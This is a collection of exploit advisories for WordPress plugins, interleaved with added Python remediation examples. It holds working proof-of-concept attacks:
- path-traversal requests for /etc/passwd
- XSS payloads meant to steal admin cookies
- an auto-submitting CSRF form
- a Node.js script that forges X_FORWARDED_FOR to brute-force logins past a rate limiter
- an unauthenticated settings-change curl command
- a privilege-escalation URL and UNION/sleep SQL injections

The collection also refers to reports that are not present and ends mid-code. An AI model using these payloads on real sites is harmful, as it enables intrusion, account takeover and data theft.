# Tested on: Debian GNU/Linux 9 (Docker)
# CVE : N/A
***********************************************************************
Discovered By: Ali S. Ahmad (S4R1N) 03 / 26 / 2019
***********************************************************************
A local file inclusion bug was discovered on the Wordpress Loco Translate (Version 2.2.1) Plugin. 

This bug can be exploited by any user who has access to the plugin, with access levels ranging from subscriber to admin. Exploitation abuses the template editing functionality of the plugin and the file-view action, which allows a user to access any system file and view its contents.
Exploitation can be done via two main methods: either using (..%2F..%2F..%2F..%2Fetc%2Fpasswd) or directly calling the file via its file path (/etc/passwd).

***********************************************************************
Tools used : 
Attacker OS : Fedora 29 
Victim OS : Debian GNU/Linux 9 (running on docker)
Manual Testing tool : Burp Repeater / Browser
***********************************************************************
Proof of Concept (PoC):

Step 1 - Log into Wordpress instance
Step 2 - Make sure the given user has access to the plugin (can be confirmed on by checking the side panel for the Loco Translate Plugin)
Step 3 - Select the theme you would like 
Step 4 - Click edit template
Step 5 - Click Source (to view file source code)
Step 6 - In the url bar change path to the file you want to read (something like /etc/passwd), file path will then be visible. 

URL : the following should yield the contents of /etc/passwd: /wp-admin/admin.php?path=%2Fetc%2Fpasswd&bundle=twentynineteen&domain=twentynineteen&page=loco-theme&action=file-view
            
# Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/localize-my-post/
# CVE: 2018-16299

# DESCRIPTION
# This bug was found in the file: /localize-my-post/ajax/include.php
# include($_REQUEST['file']);
# The parameter "file" is not sanitized, allowing local files to be included.
# To exploit the vulnerability, it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.

# Local File Inclusion POC:

GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
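The reports above for Mail Masta (`include($_GET['pl'])`), Mac Photo Gallery (`macdownload.php?albid=`), Loco Translate (the file-view `path=`), Localize My Post (`include($_REQUEST['file'])`) and, earlier on this page, WP Marketplace (`wpmp_list[file][]`) all hand a request parameter straight to `include()` or to a file read. The following is an added example, not code from any of those plugins, of a resolver that only ever returns a path inside a fixed base directory: it refuses absolute names, resolves `..` and symlinks with `realpath`, and checks containment after resolution, which is the step a prefix comparison on the raw string or a `../` substring filter misses. The directory layout built in `demo()` is constructed for the example.

```python
"""Confining a request-supplied file name to one directory (added example)."""
import os
import tempfile


class PathRejected(ValueError):
    """The requested name does not resolve to a file inside the base dir."""


def resolve_in_base(base_dir, requested):
    """Return the real path of `requested` under `base_dir`, or raise."""
    if not requested or "\x00" in requested:
        raise PathRejected("empty or NUL-containing name")
    if os.path.isabs(requested):
        raise PathRejected("absolute paths are not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # Containment is decided on the *resolved* path, so ../ sequences and
    # symlinks that point outside the directory are both caught here.
    if os.path.commonpath([base, candidate]) != base:
        raise PathRejected(f"{requested!r} resolves outside {base_dir}")
    if not os.path.isfile(candidate):
        raise PathRejected("no such file")
    return candidate


def is_allowed(base_dir, requested):
    """Boolean form, convenient for checking the reports' PoC strings."""
    try:
        resolve_in_base(base_dir, requested)
        return True
    except PathRejected:
        return False


def demo():
    """Build a sandbox: one legitimate template plus a symlink escaping it."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "templates")
        os.makedirs(base)
        with open(os.path.join(base, "footer.php"), "w") as fh:
            fh.write("<?php // legitimate template ?>")
        outside = os.path.join(tmp, "secret.txt")
        with open(outside, "w") as fh:
            fh.write("not for download")
        os.symlink(outside, os.path.join(base, "link.txt"))
        return {
            "legitimate": is_allowed(base, "footer.php"),
            "etc_passwd": is_allowed(base, "/etc/passwd"),
            "traversal": is_allowed(base, "../../../../../../../../../../etc/passwd"),
            "wp_config": is_allowed(base, "../../../wp-config.php"),
            "symlink": is_allowed(base, "link.txt"),
            "sibling_dir": is_allowed(base, "../secret.txt"),
        }


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name:12s} {'allowed' if allowed else 'rejected'}")
```

Where the set of includable files is small and fixed (page templates, language bundles), a lookup table from short names to paths is simpler still and removes the file-system resolution entirely; the resolver above is for the case where the file name genuinely has to come from the request.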
            
# Exploit Title: Live Chat Unlimited v2.8.3 Stored XSS Injection
# Google Dork: inurl:"wp-content/plugins/screets-lcx"
# Date: 2019/06/25
# Exploit Author: m0ze
# Vendor Homepage: https://screets.com/
# Software Link: https://codecanyon.net/item/wordpress-live-chat-plugin/3952877
# Version: 2.8.3
# Tested on: Windows 10 / Parrot OS
# CVE : -


Info:

Weak security measures, such as poor filtering of input field data, have been
discovered in «Live Chat Unlimited». The current version of this
premium WordPress plugin is 2.8.3.



PoC:

Go to the demo website https://site.com/try/lcx/night-bird/ and open the chat window by clicking on the «Open/close» link, then click on «Online mode» to go online. Enter your payload in the input field and press [Enter].
The example payloads provided execute in the admin area, so it is possible to steal admin cookies or force a redirect to any other
website.
Example #1: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">m0ze
Example #2: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">m0ze
            
# Exploit Title: WordPress Plugin litespeed-cache 3.6 - 'server_ip' Cross-Site Scripting
# Date: 20-12-2020
# Software Link: https://downloads.wordpress.org/plugin/litespeed-cache.3.6.zip
# Version: litespeed-cache
# Tested on: Windows 10 x64

# Description:
# A stored cross-site scripting (XSS) vulnerability was discovered in the WordPress plugin litespeed-cache 3.6.
# One parameter (server_ip) is vulnerable to cross-site scripting.

POST /wp-admin/admin.php?page=litespeed-general HTTP/1.1
Host: localhost
Content-Length: 374
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/wp-admin/admin.php?page=litespeed-general
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_a5beef43d228c89cc1d954ec4fcadda1=admin%7C1609289111%7CM6c2pV6VbnD2OElpSET6Aw3GhKFJBGdgetyfHtqxJkC%7C27d97999284897d8645200c65a7f508dffef6a9184800b2905627ccbd4d71806; wordpress_test_cookie=WP%20Cookie%20check; _lscache_vary=9effc614452472ce40565e73d3f4301c; wordpress_logged_in_a5beef43d228c89cc1d954ec4fcadda1=admin%7C1609289111%7CM6c2pV6VbnD2OElpSET6Aw3GhKFJBGdgetyfHtqxJkC%7Cd7e1a2a77822d410d7ebe2540b88dc68f908a031ceda6e884995ff419bfb6b38; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1609116311
Connection: close

LSCWP_CTRL=save-settings&LSCWP_NONCE=af21ea74b2&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dlitespeed-general&_settings-enroll%5B%5D=auto_upgrade&auto_upgrade=0&_settings-enroll%5B%5D=api_key&api_key=&_settings-enroll%5B%5D=server_ip&server_ip=%3Cscript%3Ealert%28%27Hoa%27%29%3C%2Fscript%3E&_settings-enroll%5B%5D=news&news=1&litespeed-submit=Save+Changes
            
#!/usr/bin/env node
const request = require("request")

/**
 * Exploit Title: Limit Login Attempts Reloaded by WPChef rate limiter bypass
 * Date: 2019-04-08
 * Exploit Author: isdampe
 * Software Link: https://wordpress.org/plugins/limit-login-attempts-reloaded
 * Version: 2.7.4
 * Tested on: WordPress 5.1.1
 *
 * Description
 * -----------
 *
 *  The plugin's primary goal is to limit the rate at which an individual can attempt
 *  to authenticate with WordPress. Plugin has support for HTTP headers 
 *  X_FORWARDED_FOR and X_SUCURI_CLIENTIP to allow rate limiting for users
 *  when web servers are behind a reverse proxy service.
 *  However, REMOTE_ADDR is not verified as a whitelisted proxy address, thus
 *  allowing an attacker to easily forge either the X_FORWARDED_FOR or 
 *  X_SUCURI_CLIENTIP headers to completely bypass the rate limiting service.
 *
 *  PoC
 *  ---
 */
class LoginRequest
{
	constructor(loginUri, numberOfRepititions) {
		this._loginUri = loginUri
		this._numberOfRepititions = numberOfRepititions
		this._count = 0
	}

	async process() {
		// stop on the first rejected/blocked request instead of leaving an unhandled rejection
		try {
			await this._sendRequest()
		} catch (e) {
			console.error(e)
			return
		}
		if (this._count++ < this._numberOfRepititions)
			this.process()
	}

	async _sendRequest() {
		return new Promise(async (resolve, reject) => {
			console.log(`Sending request ${this._count}...`)

			request.post({
				url : this._loginUri,
				form: {
					"log": this._getRandomString(),
					"pwd": this._getRandomString(),
					"wp-submit": "Log+In",
					"redirect_to": "/wp-admin/",
					"testcookie": "1"
				},
				headers: {
					"X_FORWARDED_FOR": this._getRandomIp()
				}
			}, (err, res, body) => {
				// on a transport error there is no body to inspect
				if (err) {
					reject(err)
					return
				}

				if (body.indexOf("Too many failed") > -1) {
					reject("Login was rejected, exploit failed.")
					return
				}

				console.log(`\tRequest ${this._count} was not blocked`)
				resolve()
			})

		})
	}

	_getRandomString() {
		// pick random characters from the map (the original appended the index, not the character)
		const map = "abcdefghijklmnopqrstuvwxyz0123456789"
		const length = Math.floor(Math.random() * 15) + 1
		let buffer = ""
		for (let i=0; i<length; ++i)
			buffer += map[Math.floor(Math.random() * map.length)]

		return buffer
	}

	_getRandomIp() {
		// four octets in the range 1..254
		const bits = []
		for (let x=0; x<4; ++x)
			bits.push(Math.floor(Math.random() * 254) + 1)
		return bits.join(".")
	}

}

if (process.argv.length < 4) {
	console.log("Usage: ./bypass-ip-block.js [url] [number_of_repititions]")
	console.log("\turl:                     The url pointing to wp-login.php, (e.g. http://localhost/wp-login.php)")
	console.log("\tnumber_of_repititions:   The number of login attempts to create (e.g. 500)")
	process.exit(1)
}

const session = new LoginRequest(process.argv[2], parseInt(process.argv[3], 10))
session.process()
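The description above pins the defect down to one missing check: the forwarding headers are honoured without first verifying that REMOTE_ADDR is a whitelisted proxy. The following is an added example, not the plugin's code, of how a rate limiter should resolve the client address; the trusted-proxy list, header names and the `LoginRateLimiter` class are constructed for the example.

```python
import ipaddress
from typing import Mapping

# Constructed trusted-proxy list: only these hosts may set the forwarding
# headers. A real deployment lists its actual reverse proxies here.
TRUSTED_PROXIES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.0.2.10/32"),
]
# Same header names the plugin honours, in order of preference.
FORWARD_HEADERS = ("X_SUCURI_CLIENTIP", "X_FORWARDED_FOR")


def _parse_ip(text: str):
    try:
        return ipaddress.ip_address(text.strip())
    except ValueError:
        return None


def is_trusted_proxy(addr) -> bool:
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr: str, headers: Mapping[str, str]) -> str:
    """Address a login rate limiter should key on.

    Forwarding headers are consulted only when REMOTE_ADDR is a whitelisted
    proxy. A direct client that forges X_FORWARDED_FOR therefore stays in the
    bucket of its real address instead of picking a fresh one per request.
    """
    peer = _parse_ip(remote_addr)
    if peer is None or not is_trusted_proxy(peer):
        return remote_addr
    for name in FORWARD_HEADERS:
        value = headers.get(name)
        if not value:
            continue
        # X-Forwarded-For is "client, proxy1, proxy2, ...": walk from the
        # right and take the first hop that is not one of our own proxies.
        for hop in reversed(value.split(",")):
            ip = _parse_ip(hop)
            if ip is None:
                return remote_addr  # garbage in the chain: do not trust it
            if not is_trusted_proxy(ip):
                return str(ip)
    return remote_addr


class LoginRateLimiter:
    """Counts failed logins per resolved client address."""

    def __init__(self, max_failures: int = 4):
        self.max_failures = max_failures
        self.failures: dict = {}

    def record_failure(self, remote_addr: str, headers: Mapping[str, str]) -> bool:
        """Record one failed login; return True once the source is blocked."""
        key = client_ip(remote_addr, headers)
        self.failures[key] = self.failures.get(key, 0) + 1
        return self.failures[key] >= self.max_failures
```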
            
Exploit Title: WP Like Button 1.6.0 - Auth Bypass
Date: 05-Jul-19
Exploit Author: Benjamin Lim
Vendor Homepage: http://www.crudlab.com
Software Link: https://wordpress.org/plugins/wp-like-button/
Version: 1.6.0
CVE : CVE-2019-13344

1. Product & Service Introduction:
WP Like Button allows you to add a Facebook Like button to your WordPress
blog. You can also add a Share button along with the Like button, or add a
Recommend button. As of now, the plugin has been downloaded 129,089 times
and has 10,000+ active installs.

2. Technical Details & Description:
An authentication bypass vulnerability in the WP Like Button (Free) plugin
version 1.6.0 allows unauthenticated attackers to change the settings of
the plugin. The contains() function in wp_like_button.php does not check whether
the current request is made by an authorized user, thus allowing any
unauthenticated user to update the settings of the plugin.

3. Proof of Concept (PoC):
For example, the curl command below allows an attacker to change the
each_page_url parameter to https://hijack.com, which lets the attacker
hijack Facebook likes.

curl -k -i --raw -X POST \
  -d "page=facebook-like-button&site_url=https%%3A%%2F%%2Flocalhost%%2Fwp&display[]=1&display[]=2&display[]=4&display[]=16&mobile=1&fb_app_id=&fb_app_admin=&kd=0&fblb_default_upload_image=&code_snippet=%%3C%%3Fphp+echo+fb_like_button()%%3B+%%3F%%3E&beforeafter=before&eachpage=url&each_page_url=https://hijack.com&language=en_US&width=65&position=center&layout=box_count&action=like&color=light&btn_size=small&faces=1&share=1&update_fblb=" \
  "https://localhost/wp/wp-admin/admin.php?page=facebook-like-button&edit=1" \
  -H "Content-Type: application/x-www-form-urlencoded"

4. Mitigation
No update has been released by the vendor. Users are advised to switch to a
different plugin.

5. Disclosure Timeline
2019/06/24 Vendor contacted regarding vulnerability in v1.5.0 (crudlab@gmail.com)
2019/06/30 Second email sent to vendor (crudlab@gmail.com)
2019/07/02 Vendor released v1.6.0 update. Vulnerability still exists.
Vendor did not acknowledge any emails.
2018/07/03 Third email sent to vendor's billing email domain (info@purelogics.net)
2018/07/05 Public disclosure

6. Credits & Authors:
Benjamin Lim - [https://limbenjamin.com]
            
# Exploit Title: WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS) 
# Date: 2021-05-10
# Exploit Author: Captain_hook
# Vendor Homepage: https://lifterlms.com/
# Software Link: https://github.com/gocodebox/lifterlms/releases/tag/4.21.0
# Version: LifterLMS < 4.21.1
# Tested on: ANY
# CVE : CVE-2021-24308

#Summary:

The 'State' field of the Edit profile page of the LMS by LifterLMS – Online Course, Membership & Learning Management System Plugin for WordPress plugin before 4.21.1 is not properly sanitised when output in the About section of the profile page, leading to a stored cross-site scripting issue. This could allow low-privilege users (such as students) to elevate their privileges via an XSS attack when an admin views their profile.

#Proof_of_Concept:

1- As a lowest-privilege user, go to the edit account page of the LMS
(e.g. https://example.com/my-courses/edit-account/)

2- Put your XSS payload in the State parameter and save your edits, such
as "><script>alert(/XSS/)</script>

3- The XSS will be stored and triggered in the About section of the profile (e.g. https://example.com/directory/[user_name]/). Note: the XSS will also be triggered in the admin dashboard when viewing the user details, for example https://example.com/wp-admin/admin.php?page=llms-reporting&tab=students&stab=information&student_id=2

References:

https://github.com/gocodebox/lifterlms/releases/tag/4.21.0
            
I would like to disclose a CSRF and stored XSS vulnerability in the WordPress
plugin LeenkMe version 2.5.0.

The plugin can be found at https://wordpress.org/plugins/leenkme/

In the page wp-content/plugins/leenkme/facebook.php

The XSS-vulnerable fields are:

   - facebook_message
   - facebook_linkname
   - facebook_caption
   - facebook_description
   - default_image
   - _wp_http_referer


This CSRF was tested on the latest WordPress installation (4.4.2) using the
Firefox browser.

The code for CSRF.html is:

<html>
  <body onload="document.forms['xss'].submit()" >
    <form name="xss" action="http://127.0.0.1/wp/wp-admin/admin.php?page=leenkme_facebook" method="POST">
      <input type="hidden" name="facebook_profile" value="on" />
      <input type="hidden" name="fb_publish_wpnonce" value="" />
      <input type="hidden" name="_wp_http_referer" value="XSS" />
      <input type="hidden" name="facebook_message" value="XSS" />
      <input type="hidden" name="facebook_linkname" value="XSS" />
      <input type="hidden" name="facebook_caption" value="XSS" />
      <input type="hidden" name="facebook_description" value="&lt;/textarea&gt;<script>prompt();</script>" />
      <input type="hidden" name="default_image" value="XSS" />
      <input type="hidden" name="message_preference" value="author" />
      <input type="hidden" name="clude" value="in" />
      <input type="hidden" name="publish_cats&#91;&#93;" value="0" />
      <input type="hidden" name="update_facebook_settings" value="Save&#32;Settings" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


The vulnerable page is

wp-content/plugins/leenkme/facebook.php

The vulnerable code producing the XSS is:


if ( !empty( $_REQUEST['facebook_message'] ) )
    $user_settings['facebook_message'] = $_REQUEST['facebook_message'];
else
    $user_settings['facebook_message'] = '';
if ( !empty( $_REQUEST['facebook_linkname'] ) )
    $user_settings['facebook_linkname'] = $_REQUEST['facebook_linkname'];
else
    $user_settings['facebook_linkname'] = '';
if ( !empty( $_REQUEST['facebook_caption'] ) )
    $user_settings['facebook_caption'] = $_REQUEST['facebook_caption'];
else
    $user_settings['facebook_caption'] = '';
if ( !empty( $_REQUEST['facebook_description'] ) )
    $user_settings['facebook_description'] = $_REQUEST['facebook_description'];


-------------------------
snip
-------------------------

                                <td><textarea name="facebook_message" style="width: 500px;" maxlength="400"><?php echo $user_settings['facebook_message']; ?></textarea></td>
                            </tr>
                            <tr>
                             <td><?php _e( 'Default Link Name:', 'leenkme' ); ?></td>
                                <td><input name="facebook_linkname" type="text" style="width: 500px;" value="<?php echo $user_settings['facebook_linkname']; ?>"  maxlength="100"/></td>
                            </tr>
                            <tr>
                             <td><?php _e( 'Default Caption:', 'leenkme' ); ?></td>
                                <td><input name="facebook_caption" type="text" style="width: 500px;" value="<?php echo $user_settings['facebook_caption']; ?>" maxlength="100"/></td>
                            </tr>
                            <tr>
                             <td style='vertical-align: top; padding-top: 5px;'><?php _e( 'Default Description:', 'leenkme' ); ?></td>
                                <td><textarea name="facebook_description" style="width: 500px;" maxlength="300"><?php echo $user_settings['facebook_description']; ?></textarea></td>


The code used to protect against CSRF, that is, the anti-CSRF token, is:

<?php wp_nonce_field( 'fb_publish', 'fb_publish_wpnonce' ); ?>


But this code does not protect against CSRF: the form is submitted
successfully without any error even when fb_publish_wpnonce is left
empty, resulting in a CSRF vulnerability.
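Two things go wrong above: the handler stores the fields before the nonce has been checked (and an empty nonce passes), and the stored values are echoed unescaped into a textarea and into attribute values. The following added example, written in Python rather than the plugin's PHP and not part of the original report, models the corrected handler: a 12-hour-tick HMAC nonce that refuses an empty token, and context-aware escaping so the report's `</textarea><script>` payload cannot break out. The secret, the action name and the field list are constructed for the example.

```python
import hashlib
import hmac
import html
import time

# Constructed secret; a real site derives it from its own secret keys/salts.
SECRET = b"constructed-site-secret"
TICK_SECONDS = 12 * 3600        # WordPress nonces rotate on a 12-hour tick
ACTION = "fb_publish"
NONCE_FIELD = "fb_publish_wpnonce"
TEXT_FIELDS = ("facebook_message", "facebook_linkname", "facebook_caption",
               "facebook_description", "default_image")


def _tick(now: float) -> int:
    return int(now // TICK_SECONDS)


def _nonce_for(tick: int, action: str, user_id: int) -> str:
    msg = f"{tick}|{action}|{user_id}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[:10]


def create_nonce(action: str, user_id: int, now: float = None) -> str:
    now = time.time() if now is None else now
    return _nonce_for(_tick(now), action, user_id)


def verify_nonce(token: str, action: str, user_id: int, now: float = None) -> bool:
    """True only for a non-empty token valid for this or the previous tick."""
    if not token:       # the defect in the report: an empty token was accepted
        return False
    now = time.time() if now is None else now
    for tick in (_tick(now), _tick(now) - 1):
        expected = _nonce_for(tick, action, user_id)
        if hmac.compare_digest(token.encode(), expected.encode()):
            return True
    return False


def save_settings(form: dict, user_id: int, now: float = None):
    """Settings handler model: verify the nonce before touching any field.

    Returns (True, settings) or (False, reason).
    """
    if not verify_nonce(form.get(NONCE_FIELD, ""), ACTION, user_id, now):
        return False, "nonce check failed"
    settings = {name: form.get(name, "").strip() for name in TEXT_FIELDS}
    return True, settings


def render_textarea(name: str, value: str) -> str:
    """Escape element content so a stored '</textarea>' cannot close the tag."""
    return (f'<textarea name="{html.escape(name)}">'
            f'{html.escape(value)}</textarea>')


def render_input(name: str, value: str) -> str:
    """Escape an attribute value so a stored '"' cannot break out of value="..."."""
    return (f'<input name="{html.escape(name)}" type="text" '
            f'value="{html.escape(value)}"/>')
```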



# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
            
# Exploit Title: WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming
# Date: 08-01-2022
# Exploit Author: Ceylan Bozogullarindan
# Author Webpage: https://bozogullarindan.com
# Vendor Homepage: https://thimpress.com/
# Software Link: https://thimpress.com/learnpress-plugin/
# Version: 4.1.4.1
# Tested on: Linux
# CVE: CVE-2022-0377 (https://wpscan.com/vulnerability/0d95ada6-53e3-4a80-a395-eacd7b090f26)


# Description:

LearnPress is a complete WordPress solution for creating a Learning Management System (LMS). It can help you create courses, lessons and quizzes.

A user of this LMS can upload an image as a profile avatar after registration. The user then crops and saves the image, and a POST request containing the user-supplied name of the image is sent to the server to rename and crop it. As a result of this request, the name of the user-supplied image is replaced with an MD5 value. This happens only when the image type is JPG or PNG.

An attacker can use this vulnerability to rename an arbitrary image file and thereby break the design of the website. Some examples of malicious actions:

- Destroying a website's banner
- Destroying user avatars
- Destroying post images
- Destroying button/app images etc.

# Steps To Reproduce

1. Register and log in to the LearnPress system.
2. Go to the profile page and upload an avatar image: https://<learnpress-website>/lp-profile/<your-username>/settings/avatar/
3. While saving the image, intercept the POST request with a local proxy tool such as Burp Suite.
4. Change the value of the `lp-user-avatar-crop[name]` parameter to the path of an arbitrary image file on the website (for example /2021/01/image.png or /../../image.png). The path is relative to "/wp-content/uploads/".
5. Forward the intercepted request and check whether the image file given in step 4 still exists.
6. You will see that the image cannot be found, because it has been renamed.
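The root cause in the steps above is that `lp-user-avatar-crop[name]` is joined onto the uploads directory without confining it to the user's own avatar folder or checking the extension the description says is required. The following added example, written in Python rather than the plugin's PHP and not part of the advisory, shows the containment check a rename step should make; the per-user folder layout follows the `learn-press-profile/<user_id>/` path in the response below, and the uploads directory in the test is constructed.

```python
import os

ALLOWED_EXT = {".jpg", ".jpeg", ".png"}


def resolve_avatar_target(uploads_dir: str, user_id: int, name: str) -> str:
    """Absolute path the crop/rename step may touch, or ValueError.

    The target must stay inside this user's own avatar folder beneath
    uploads_dir and must carry a JPG/PNG extension, so '..' segments, leading
    slashes and other users' folders are all rejected before any rename.
    """
    if not name or "\x00" in name:
        raise ValueError("empty or NUL-containing name")
    base = os.path.realpath(
        os.path.join(uploads_dir, "learn-press-profile", str(user_id)))
    # Strip a leading slash so join() cannot be made to discard base, then let
    # realpath() collapse any '..' before we compare.
    rel = name.replace("\\", "/").lstrip("/")
    candidate = os.path.realpath(os.path.join(base, rel))
    # commonpath() compares whole path components, unlike str.startswith(),
    # so '.../2' does not accidentally match '.../22/...'.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes avatar folder: {name!r}")
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        raise ValueError(f"not a JPG/PNG: {name!r}")
    return candidate


def is_allowed_avatar_name(uploads_dir: str, user_id: int, name: str) -> bool:
    """Convenience wrapper: True when the name passes all checks."""
    try:
        resolve_avatar_target(uploads_dir, user_id, name)
        return True
    except ValueError:
        return False
```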

# PoC - Supported Materials

Request
---------------------------------------------------------------------------
POST /lp-profile/<username>/settings/avatar/?lp-ajax=save-uploaded-user-avatar HTTP/1.1
Host: 127.0.0.1:8000
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 242
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/lp-profile/ceylanb/settings/avatar/
Cookie: _learn_press_session_4411def9d576984c8d78253236b2a62f=4509d5151308952d51776226bb847241%7C%7C1641770556%7C%7C19e385a78349f37ac993a36ecda9c41f; wordpress_lp_cart=1; wordpress_logged_in_4411def9d576984c8d78253236b2a62f=ceylanb%7C1642807471%7CRKS5hU3q1b2G0xY1pkwfl43yVJdIqz9fqBLcknvbyzJ%7C98d337987ee0cbc7539a742e2ebbfbe107d1e0c910c3efd9daa51c4775236e19; LP=%7B%22course-tab%22%3A%22overview%22%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
DNT: 1
Sec-GPC: 1

lp-user-avatar-crop%5Bname%5D=%2f..%2f..%2fimage.jpg&lp-user-avatar-crop%5Bwidth%5D=250&lp-user-avatar-crop%5Bheight%5D=250&lp-user-avatar-crop%5Bpoints%5D=0%2C0%2C300%2C300&lp-user-avatar-crop%5Bnonce%5D=8bdc969b07&lp-user-avatar-custom=yes
---------------------------------------------------------------------------

Response
---------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2022 00:30:11 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <http://127.0.0.1:8000/wp-json/>; rel="https://api.w.org/"
Link: <http://127.0.0.1:8000/wp-json/wp/v2/pages/17>; rel="alternate"; type="application/json"
Link: <http://127.0.0.1:8000/?p=17>; rel=shortlink
Vary: Accept-Encoding
Content-Length: 191
Connection: close
Content-Type: text/html; charset=UTF-8

<-- LP_AJAX_START -->{"success":true,"avatar":"<img src=\"http:\/\/127.0.0.1:8000\/wp-content\/uploads\/learn-press-profile\/2\/f574f3e6594498507333c41af9426d43.jpg\" \/>"}<-- LP_AJAX_END -->
---------------------------------------------------------------------------
            
# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.9
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
# CVE: CVE-2020-11511

POC:
1. Find out your user id
2. Log in with your credentials
3. Request the payload URL


http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>

# Done!
            
# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.8
# References link: https://wpscan.com/vulnerability/10208
# CVE: CVE-2020-6010

POC:
1. Go to http://<host>/wp-admin
2. Log in with valid credentials
3. Send the request below


POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 128
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145

type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -

# Modify current_items[] as you want
            
# Exploit Title: Good LMS - Learning Management System WP Plugin SQL Injection
# Date: 2018-01-24
# Exploit Author: Esecurity.ir
# Exploit Author Web Site: http://esecurity.ir
# Special Thanks : Meisam Monsef [meisamrce@gmail.com] - Telegram ID : @meisamrce
# Vendor Homepage: https://goodlayers.com/
# Version: All Version

Exploit :

	1 - First open the link below and create an account
	http://target.com/?register=1
	2 - Then request the exploit URL
	http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+[SQL+Command]%23
	http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+union+select+1,2,3,user()%23
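Both the LearnPress `current_items[]` injection above and this Good LMS `course_id` injection come from concatenating a request value that should only ever be an integer into SQL. The following added example, written in Python with sqlite3 rather than the plugins' PHP and not part of either advisory, shows the two corrected lookups: the id list is validated as plain decimals and expanded into placeholders, and `course_id` is bound as a parameter. The tables and rows are a constructed fixture.

```python
import re
import sqlite3

_ID_RE = re.compile(r"[0-9]+")


def parse_id_list(values) -> list:
    """Accept only plain decimal ids; anything else is rejected, not coerced."""
    ids = []
    for v in values:
        s = str(v).strip()
        if not _ID_RE.fullmatch(s):
            raise ValueError(f"invalid id: {v!r}")
        ids.append(int(s))
    return ids


def search_items(conn, term: str, current_items, post_type: str = "lp_course"):
    """Model of modal_search_items: every user value travels as a bound parameter.

    current_items[] is validated as integers and then expanded into one '?'
    placeholder per element; the SQL text never contains user input.
    """
    ids = parse_id_list(current_items)
    sql = "SELECT id, title FROM posts WHERE post_type = ? AND title LIKE ?"
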